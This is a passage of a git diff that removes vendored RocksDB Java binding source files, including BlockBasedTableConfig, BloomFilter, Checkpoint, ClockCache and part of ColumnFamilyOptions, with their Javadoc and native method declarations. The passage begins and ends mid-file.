-  public long blockCacheSize() {
-    return blockCacheSize_;
-  }
-
-  /**
-   * Controls the number of shards for the block cache.
-   * This is applied only if cacheSize is set to non-negative.
-   *
-   * @param blockCacheNumShardBits the number of shard bits. The resulting
-   *     number of shards would be 2 ^ numShardBits.  Any negative
-   *     number means use default settings."
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setCacheNumShardBits(
-      final int blockCacheNumShardBits) {
-    blockCacheNumShardBits_ = blockCacheNumShardBits;
-    return this;
-  }
-
-  /**
-   * Returns the number of shard bits used in the block cache.
-   * The resulting number of shards would be 2 ^ (returned value).
-   * Any negative number means use default settings.
-   *
-   * @return the number of shard bits used in the block cache.
-   */
-  public int cacheNumShardBits() {
-    return blockCacheNumShardBits_;
-  }
-
-  /**
-   * Approximate size of user data packed per block.  Note that the
-   * block size specified here corresponds to uncompressed data.  The
-   * actual size of the unit read from disk may be smaller if
-   * compression is enabled.  This parameter can be changed dynamically.
-   * Default: 4K
-   *
-   * @param blockSize block size in bytes
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockSize(final long blockSize) {
-    blockSize_ = blockSize;
-    return this;
-  }
-
-  /**
-   * @return block size in bytes
-   */
-  public long blockSize() {
-    return blockSize_;
-  }
-
-  /**
-   * This is used to close a block before it reaches the configured
-   * 'block_size'. If the percentage of free space in the current block is less
-   * than this specified number and adding a new record to the block will
-   * exceed the configured block size, then this block will be closed and the
-   * new record will be written to the next block.
-   * Default is 10.
-   *
-   * @param blockSizeDeviation the deviation to block size allowed
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockSizeDeviation(
-      final int blockSizeDeviation) {
-    blockSizeDeviation_ = blockSizeDeviation;
-    return this;
-  }
-
-  /**
-   * @return the hash table ratio.
-   */
-  public int blockSizeDeviation() {
-    return blockSizeDeviation_;
-  }
-
-  /**
-   * Set block restart interval
-   *
-   * @param restartInterval block restart interval.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockRestartInterval(
-      final int restartInterval) {
-    blockRestartInterval_ = restartInterval;
-    return this;
-  }
-
-  /**
-   * @return block restart interval
-   */
-  public int blockRestartInterval() {
-    return blockRestartInterval_;
-  }
-
-  /**
-   * If true, place whole keys in the filter (not just prefixes).
-   * This must generally be true for gets to be efficient.
-   * Default: true
-   *
-   * @param wholeKeyFiltering if enable whole key filtering
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setWholeKeyFiltering(
-      final boolean wholeKeyFiltering) {
-    wholeKeyFiltering_ = wholeKeyFiltering;
-    return this;
-  }
-
-  /**
-   * @return if whole key filtering is enabled
-   */
-  public boolean wholeKeyFiltering() {
-    return wholeKeyFiltering_;
-  }
-
-  /**
-   * Use the specified filter policy to reduce disk reads.
-   *
-   * {@link org.rocksdb.Filter} should not be disposed before options instances
-   * using this filter is disposed. If {@link Filter#dispose()} function is not
-   * called, then filter object will be GC'd automatically.
-   *
-   * {@link org.rocksdb.Filter} instance can be re-used in multiple options
-   * instances.
-   *
-   * @param filter {@link org.rocksdb.Filter} Filter Policy java instance.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setFilter(
-      final Filter filter) {
-    filter_ = filter;
-    return this;
-  }
-
-  /**
-   * Indicating if we'd put index/filter blocks to the block cache.
-     If not specified, each "table reader" object will pre-load index/filter
-     block during table initialization.
-   *
-   * @return if index and filter blocks should be put in block cache.
-   */
-  public boolean cacheIndexAndFilterBlocks() {
-    return cacheIndexAndFilterBlocks_;
-  }
-
-  /**
-   * Indicating if we'd put index/filter blocks to the block cache.
-     If not specified, each "table reader" object will pre-load index/filter
-     block during table initialization.
-   *
-   * @param cacheIndexAndFilterBlocks and filter blocks should be put in block cache.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setCacheIndexAndFilterBlocks(
-      final boolean cacheIndexAndFilterBlocks) {
-    cacheIndexAndFilterBlocks_ = cacheIndexAndFilterBlocks;
-    return this;
-  }
-
-  /**
-   * Indicating if we'd like to pin L0 index/filter blocks to the block cache.
-     If not specified, defaults to false.
-   *
-   * @return if L0 index and filter blocks should be pinned to the block cache.
-   */
-  public boolean pinL0FilterAndIndexBlocksInCache() {
-    return pinL0FilterAndIndexBlocksInCache_;
-  }
-
-  /**
-   * Indicating if we'd like to pin L0 index/filter blocks to the block cache.
-     If not specified, defaults to false.
-   *
-   * @param pinL0FilterAndIndexBlocksInCache pin blocks in block cache
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setPinL0FilterAndIndexBlocksInCache(
-      final boolean pinL0FilterAndIndexBlocksInCache) {
-    pinL0FilterAndIndexBlocksInCache_ = pinL0FilterAndIndexBlocksInCache;
-    return this;
-  }
-
-  /**
-   * Influence the behavior when kHashSearch is used.
-     if false, stores a precise prefix to block range mapping
-     if true, does not store prefix and allows prefix hash collision
-     (less memory consumption)
-   *
-   * @return if hash collisions should be allowed.
-   */
-  public boolean hashIndexAllowCollision() {
-    return hashIndexAllowCollision_;
-  }
-
-  /**
-   * Influence the behavior when kHashSearch is used.
-     if false, stores a precise prefix to block range mapping
-     if true, does not store prefix and allows prefix hash collision
-     (less memory consumption)
-   *
-   * @param hashIndexAllowCollision points out if hash collisions should be allowed.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setHashIndexAllowCollision(
-      final boolean hashIndexAllowCollision) {
-    hashIndexAllowCollision_ = hashIndexAllowCollision;
-    return this;
-  }
-
-  /**
-   * Size of compressed block cache. If 0, then block_cache_compressed is set
-   * to null.
-   *
-   * @return size of compressed block cache.
-   */
-  public long blockCacheCompressedSize() {
-    return blockCacheCompressedSize_;
-  }
-
-  /**
-   * Size of compressed block cache. If 0, then block_cache_compressed is set
-   * to null.
-   *
-   * @param blockCacheCompressedSize of compressed block cache.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockCacheCompressedSize(
-      final long blockCacheCompressedSize) {
-    blockCacheCompressedSize_ = blockCacheCompressedSize;
-    return this;
-  }
-
-  /**
-   * Controls the number of shards for the block compressed cache.
-   * This is applied only if blockCompressedCacheSize is set to non-negative.
-   *
-   * @return numShardBits the number of shard bits.  The resulting
-   *     number of shards would be 2 ^ numShardBits.  Any negative
-   *     number means use default settings.
-   */
-  public int blockCacheCompressedNumShardBits() {
-    return blockCacheCompressedNumShardBits_;
-  }
-
-  /**
-   * Controls the number of shards for the block compressed cache.
-   * This is applied only if blockCompressedCacheSize is set to non-negative.
-   *
-   * @param blockCacheCompressedNumShardBits the number of shard bits.  The resulting
-   *     number of shards would be 2 ^ numShardBits.  Any negative
-   *     number means use default settings."
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setBlockCacheCompressedNumShardBits(
-      final int blockCacheCompressedNumShardBits) {
-    blockCacheCompressedNumShardBits_ = blockCacheCompressedNumShardBits;
-    return this;
-  }
-
-  /**
-   * Sets the checksum type to be used with this table.
-   *
-   * @param checksumType {@link org.rocksdb.ChecksumType} value.
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setChecksumType(
-      final ChecksumType checksumType) {
-    checksumType_ = checksumType;
-    return this;
-  }
-
-  /**
-   *
-   * @return the currently set checksum type
-   */
-  public ChecksumType checksumType() {
-    return checksumType_;
-  }
-
-  /**
-   * Sets the index type to used with this table.
-   *
-   * @param indexType {@link org.rocksdb.IndexType} value
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setIndexType(
-      final IndexType indexType) {
-    indexType_ = indexType;
-    return this;
-  }
-
-  /**
-   *
-   * @return the currently set index type
-   */
-  public IndexType indexType() {
-    return indexType_;
-  }
-
-  /**
-   * <p>We currently have three versions:</p>
-   *
-   * <ul>
-   * <li><strong>0</strong> - This version is currently written
-   * out by all RocksDB's versions by default. Can be read by really old
-   * RocksDB's. Doesn't support changing checksum (default is CRC32).</li>
-   * <li><strong>1</strong> - Can be read by RocksDB's versions since 3.0.
-   * Supports non-default checksum, like xxHash. It is written by RocksDB when
-   * BlockBasedTableOptions::checksum is something other than kCRC32c. (version
-   * 0 is silently upconverted)</li>
-   * <li><strong>2</strong> - Can be read by RocksDB's versions since 3.10.
-   * Changes the way we encode compressed blocks with LZ4, BZip2 and Zlib
-   * compression. If you don't plan to run RocksDB before version 3.10,
-   * you should probably use this.</li>
-   * </ul>
-   * <p> This option only affects newly written tables. When reading existing
-   * tables, the information about version is read from the footer.</p>
-   *
-   * @param formatVersion integer representing the version to be used.
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setFormatVersion(
-      final int formatVersion) {
-    assert(formatVersion >= 0 && formatVersion <= 2);
-    formatVersion_ = formatVersion;
-    return this;
-  }
-
-  /**
-   *
-   * @return the currently configured format version.
-   * See also: {@link #setFormatVersion(int)}.
-   */
-  public int formatVersion() {
-    return formatVersion_;
-  }
-
-
-
-  @Override protected long newTableFactoryHandle() {
-    long filterHandle = 0;
-    if (filter_ != null) {
-      filterHandle = filter_.nativeHandle_;
-    }
-
-    return newTableFactoryHandle(noBlockCache_, blockCacheSize_,
-        blockCacheNumShardBits_, blockSize_, blockSizeDeviation_,
-        blockRestartInterval_, wholeKeyFiltering_,
-        filterHandle, cacheIndexAndFilterBlocks_,
-        pinL0FilterAndIndexBlocksInCache_,
-        hashIndexAllowCollision_, blockCacheCompressedSize_,
-        blockCacheCompressedNumShardBits_,
-        checksumType_.getValue(), indexType_.getValue(),
-        formatVersion_);
-  }
-
-  private native long newTableFactoryHandle(
-      boolean noBlockCache, long blockCacheSize, int blockCacheNumShardBits,
-      long blockSize, int blockSizeDeviation, int blockRestartInterval,
-      boolean wholeKeyFiltering, long filterPolicyHandle,
-      boolean cacheIndexAndFilterBlocks, boolean pinL0FilterAndIndexBlocksInCache,
-      boolean hashIndexAllowCollision, long blockCacheCompressedSize,
-      int blockCacheCompressedNumShardBits, byte checkSumType,
-      byte indexType, int formatVersion);
-
-  private boolean cacheIndexAndFilterBlocks_;
-  private boolean pinL0FilterAndIndexBlocksInCache_;
-  private IndexType indexType_;
-  private boolean hashIndexAllowCollision_;
-  private ChecksumType checksumType_;
-  private boolean noBlockCache_;
-  private long blockSize_;
-  private long blockCacheSize_;
-  private int blockCacheNumShardBits_;
-  private long blockCacheCompressedSize_;
-  private int blockCacheCompressedNumShardBits_;
-  private int blockSizeDeviation_;
-  private int blockRestartInterval_;
-  private Filter filter_;
-  private boolean wholeKeyFiltering_;
-  private int formatVersion_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BloomFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BloomFilter.java
deleted file mode 100644
index 316c3ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BloomFilter.java
+++ /dev/null
@@ -1,79 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Bloom filter policy that uses a bloom filter with approximately
- * the specified number of bits per key.
- *
- * <p>
- * Note: if you are using a custom comparator that ignores some parts
- * of the keys being compared, you must not use this {@code BloomFilter}
- * and must provide your own FilterPolicy that also ignores the
- * corresponding parts of the keys. For example, if the comparator
- * ignores trailing spaces, it would be incorrect to use a
- * FilterPolicy (like {@code BloomFilter}) that does not ignore
- * trailing spaces in keys.</p>
- */
-public class BloomFilter extends Filter {
-
-  private static final int DEFAULT_BITS_PER_KEY = 10;
-  private static final boolean DEFAULT_MODE = true;
-
-  /**
-   * BloomFilter constructor
-   *
-   * <p>
-   * Callers must delete the result after any database that is using the
-   * result has been closed.</p>
-   */
-  public BloomFilter() {
-    this(DEFAULT_BITS_PER_KEY, DEFAULT_MODE);
-  }
-
-  /**
-   * BloomFilter constructor
-   *
-   * <p>
-   * bits_per_key: bits per key in bloom filter. A good value for bits_per_key
-   * is 10, which yields a filter with ~ 1% false positive rate.
-   * </p>
-   * <p>
-   * Callers must delete the result after any database that is using the
-   * result has been closed.</p>
-   *
-   * @param bitsPerKey number of bits to use
-   */
-  public BloomFilter(final int bitsPerKey) {
-    this(bitsPerKey, DEFAULT_MODE);
-  }
-
-  /**
-   * BloomFilter constructor
-   *
-   * <p>
-   * bits_per_key: bits per key in bloom filter. A good value for bits_per_key
-   * is 10, which yields a filter with ~ 1% false positive rate.
-   * <p><strong>default bits_per_key</strong>: 10</p>
-   *
-   * <p>use_block_based_builder: use block based filter rather than full filter.
-   * If you want to builder full filter, it needs to be set to false.
-   * </p>
-   * <p><strong>default mode: block based filter</strong></p>
-   * <p>
-   * Callers must delete the result after any database that is using the
-   * result has been closed.</p>
-   *
-   * @param bitsPerKey number of bits to use
-   * @param useBlockBasedMode use block based mode or full filter mode
-   */
-  public BloomFilter(final int bitsPerKey, final boolean useBlockBasedMode) {
-    super(createNewBloomFilter(bitsPerKey, useBlockBasedMode));
-  }
-
-  private native static long createNewBloomFilter(final int bitsKeyKey,
-      final boolean useBlockBasedMode);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BuiltinComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BuiltinComparator.java
deleted file mode 100644
index 2c89bf2..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BuiltinComparator.java
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Builtin RocksDB comparators
- *
- * <ol>
- *   <li>BYTEWISE_COMPARATOR - Sorts all keys in ascending bytewise
- *   order.</li>
- *   <li>REVERSE_BYTEWISE_COMPARATOR - Sorts all keys in descending bytewise
- *   order</li>
- * </ol>
- */
-public enum BuiltinComparator {
-  BYTEWISE_COMPARATOR, REVERSE_BYTEWISE_COMPARATOR
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Cache.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Cache.java
deleted file mode 100644
index 3952e1d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Cache.java
+++ /dev/null
@@ -1,13 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-
-public abstract class Cache extends RocksObject {
-  protected Cache(final long nativeHandle) {
-    super(nativeHandle);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java
deleted file mode 100644
index 26bf358..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java
+++ /dev/null
@@ -1,18 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Just a Java wrapper around CassandraCompactionFilter implemented in C++
- */
-public class CassandraCompactionFilter
-    extends AbstractCompactionFilter<Slice> {
-  public CassandraCompactionFilter(boolean purgeTtlOnExpiration) {
-      super(createNewCassandraCompactionFilter0(purgeTtlOnExpiration));
-  }
-
-  private native static long createNewCassandraCompactionFilter0(boolean purgeTtlOnExpiration);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java
deleted file mode 100644
index a09556a..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java
+++ /dev/null
@@ -1,20 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * CassandraValueMergeOperator is a merge operator that merges two cassandra wide column
- * values.
- */
-public class CassandraValueMergeOperator extends MergeOperator {
-    public CassandraValueMergeOperator() {
-        super(newSharedCassandraValueMergeOperator());
-    }
-
-    private native static long newSharedCassandraValueMergeOperator();
-
-    @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Checkpoint.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Checkpoint.java
deleted file mode 100644
index 0009699..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Checkpoint.java
+++ /dev/null
@@ -1,66 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Provides Checkpoint functionality. Checkpoints
- * provide persistent snapshots of RocksDB databases.
- */
-public class Checkpoint extends RocksObject {
-
-  /**
-   * Creates a Checkpoint object to be used for creating open-able
-   * snapshots.
-   *
-   * @param db {@link RocksDB} instance.
-   * @return a Checkpoint instance.
-   *
-   * @throws java.lang.IllegalArgumentException if {@link RocksDB}
-   *     instance is null.
-   * @throws java.lang.IllegalStateException if {@link RocksDB}
-   *     instance is not initialized.
-   */
-  public static Checkpoint create(final RocksDB db) {
-    if (db == null) {
-      throw new IllegalArgumentException(
-          "RocksDB instance shall not be null.");
-    } else if (!db.isOwningHandle()) {
-      throw new IllegalStateException(
-          "RocksDB instance must be initialized.");
-    }
-    Checkpoint checkpoint = new Checkpoint(db);
-    return checkpoint;
-  }
-
-  /**
-   * <p>Builds an open-able snapshot of RocksDB on the same disk, which
-   * accepts an output directory on the same disk, and under the directory
-   * (1) hard-linked SST files pointing to existing live SST files
-   * (2) a copied manifest files and other files</p>
-   *
-   * @param checkpointPath path to the folder where the snapshot is going
-   *     to be stored.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void createCheckpoint(final String checkpointPath)
-      throws RocksDBException {
-    createCheckpoint(nativeHandle_, checkpointPath);
-  }
-
-  private Checkpoint(final RocksDB db) {
-    super(newCheckpoint(db.nativeHandle_));
-    this.db_ = db;
-  }
-
-  private final RocksDB db_;
-
-  private static native long newCheckpoint(long dbHandle);
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void createCheckpoint(long handle, String checkpointPath)
-      throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ChecksumType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ChecksumType.java
deleted file mode 100644
index def9f2e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ChecksumType.java
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Checksum types used in conjunction with BlockBasedTable.
- */
-public enum ChecksumType {
-  /**
-   * Not implemented yet.
-   */
-  kNoChecksum((byte) 0),
-  /**
-   * CRC32 Checksum
-   */
-  kCRC32c((byte) 1),
-  /**
-   * XX Hash
-   */
-  kxxHash((byte) 2);
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  private ChecksumType(byte value) {
-    value_ = value;
-  }
-
-  private final byte value_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ClockCache.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ClockCache.java
deleted file mode 100644
index a66dc0e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ClockCache.java
+++ /dev/null
@@ -1,59 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Similar to {@link LRUCache}, but based on the CLOCK algorithm with
- * better concurrent performance in some cases
- */
-public class ClockCache extends Cache {
-
-  /**
-   * Create a new cache with a fixed size capacity.
-   *
-   * @param capacity The fixed size capacity of the cache
-   */
-  public ClockCache(final long capacity) {
-    super(newClockCache(capacity, -1, false));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   */
-  public ClockCache(final long capacity, final int numShardBits) {
-    super(newClockCache(capacity, numShardBits, false));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard. If strictCapacityLimit
-   * is set, insert to the cache will fail when cache is full.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   * @param strictCapacityLimit insert to the cache will fail when cache is full
-   */
-  public ClockCache(final long capacity, final int numShardBits,
-      final boolean strictCapacityLimit) {
-    super(newClockCache(capacity, numShardBits, strictCapacityLimit));
-  }
-
-  private native static long newClockCache(final long capacity,
-      final int numShardBits, final boolean strictCapacityLimit);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java
deleted file mode 100644
index d932fd9..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java
+++ /dev/null
@@ -1,61 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Describes a column family with a
- * name and respective Options.</p>
- */
-public class ColumnFamilyDescriptor {
-
-  /**
-   * <p>Creates a new Column Family using a name and default
-   * options,</p>
-   *
-   * @param columnFamilyName name of column family.
-   * @since 3.10.0
-   */
-  public ColumnFamilyDescriptor(final byte[] columnFamilyName) {
-    this(columnFamilyName, new ColumnFamilyOptions());
-  }
-
-  /**
-   * <p>Creates a new Column Family using a name and custom
-   * options.</p>
-   *
-   * @param columnFamilyName name of column family.
-   * @param columnFamilyOptions options to be used with
-   *     column family.
-   * @since 3.10.0
-   */
-  public ColumnFamilyDescriptor(final byte[] columnFamilyName,
-      final ColumnFamilyOptions columnFamilyOptions) {
-    columnFamilyName_ = columnFamilyName;
-    columnFamilyOptions_ = columnFamilyOptions;
-  }
-
-  /**
-   * Retrieve name of column family.
-   *
-   * @return column family name.
-   * @since 3.10.0
-   */
-  public byte[] columnFamilyName() {
-    return columnFamilyName_;
-  }
-
-  /**
-   * Retrieve assigned options instance.
-   *
-   * @return Options instance assigned to this instance.
-   */
-  public ColumnFamilyOptions columnFamilyOptions() {
-    return columnFamilyOptions_;
-  }
-
-  private final byte[] columnFamilyName_;
-  private final ColumnFamilyOptions columnFamilyOptions_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java
deleted file mode 100644
index 7726cc6..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java
+++ /dev/null
@@ -1,42 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * ColumnFamilyHandle class to hold handles to underlying rocksdb
- * ColumnFamily Pointers.
- */
-public class ColumnFamilyHandle extends RocksObject {
-  ColumnFamilyHandle(final RocksDB rocksDB,
-      final long nativeHandle) {
-    super(nativeHandle);
-    // rocksDB must point to a valid RocksDB instance;
-    assert(rocksDB != null);
-    // ColumnFamilyHandle must hold a reference to the related RocksDB instance
-    // to guarantee that while a GC cycle starts ColumnFamilyHandle instances
-    // are freed prior to RocksDB instances.
-    this.rocksDB_ = rocksDB;
-  }
-
-  /**
-   * <p>Deletes underlying C++ iterator pointer.</p>
-   *
-   * <p>Note: the underlying handle can only be safely deleted if the RocksDB
-   * instance related to a certain ColumnFamilyHandle is still valid and
-   * initialized. Therefore {@code disposeInternal()} checks if the RocksDB is
-   * initialized before freeing the native handle.</p>
-   */
-  @Override
-  protected void disposeInternal() {
-    if(rocksDB_.isOwningHandle()) {
-      disposeInternal(nativeHandle_);
-    }
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-
-  private final RocksDB rocksDB_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java
deleted file mode 100644
index 647b92e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java
+++ /dev/null
@@ -1,909 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.Properties;
-
-/**
- * ColumnFamilyOptions to control the behavior of a database.  It will be used
- * during the creation of a {@link org.rocksdb.RocksDB} (i.e., RocksDB.open()).
- *
- * If {@link #dispose()} function is not called, then it will be GC'd
- * automatically and native resources will be released as part of the process.
- */
-public class ColumnFamilyOptions extends RocksObject
-    implements ColumnFamilyOptionsInterface<ColumnFamilyOptions>,
-    MutableColumnFamilyOptionsInterface<ColumnFamilyOptions> {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct ColumnFamilyOptions.
-   *
-   * This constructor will create (by allocating a block of memory)
-   * an {@code rocksdb::DBOptions} in the c++ side.
-   */
-  public ColumnFamilyOptions() {
-    super(newColumnFamilyOptions());
-  }
-
-  /**
-   * <p>Method to get a options instance by using pre-configured
-   * property values. If one or many values are undefined in
-   * the context of RocksDB the method will return a null
-   * value.</p>
-   *
-   * <p><strong>Note</strong>: Property keys can be derived from
-   * getter methods within the options class. Example: the method
-   * {@code writeBufferSize()} has a property key:
-   * {@code write_buffer_size}.</p>
-   *
-   * @param properties {@link java.util.Properties} instance.
-   *
-   * @return {@link org.rocksdb.ColumnFamilyOptions instance}
-   *     or null.
-   *
-   * @throws java.lang.IllegalArgumentException if null or empty
-   *     {@link Properties} instance is passed to the method call.
-   */
-  public static ColumnFamilyOptions getColumnFamilyOptionsFromProps(
-      final Properties properties) {
-    if (properties == null || properties.size() == 0) {
-      throw new IllegalArgumentException(
-          "Properties value must contain at least one value.");
-    }
-    ColumnFamilyOptions columnFamilyOptions = null;
-    StringBuilder stringBuilder = new StringBuilder();
-    for (final String name : properties.stringPropertyNames()){
-      stringBuilder.append(name);
-      stringBuilder.append("=");
-      stringBuilder.append(properties.getProperty(name));
-      stringBuilder.append(";");
-    }
-    long handle = getColumnFamilyOptionsFromProps(
-        stringBuilder.toString());
-    if (handle != 0){
-      columnFamilyOptions = new ColumnFamilyOptions(handle);
-    }
-    return columnFamilyOptions;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeForSmallDb() {
-    optimizeForSmallDb(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeForPointLookup(
-      final long blockCacheSizeMb) {
-    optimizeForPointLookup(nativeHandle_,
-        blockCacheSizeMb);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeLevelStyleCompaction() {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeLevelStyleCompaction(
-      final long memtableMemoryBudget) {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeUniversalStyleCompaction() {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeUniversalStyleCompaction(
-      final long memtableMemoryBudget) {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setComparator(
-      final BuiltinComparator builtinComparator) {
-    assert(isOwningHandle());
-    setComparatorHandle(nativeHandle_, builtinComparator.ordinal());
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setComparator(
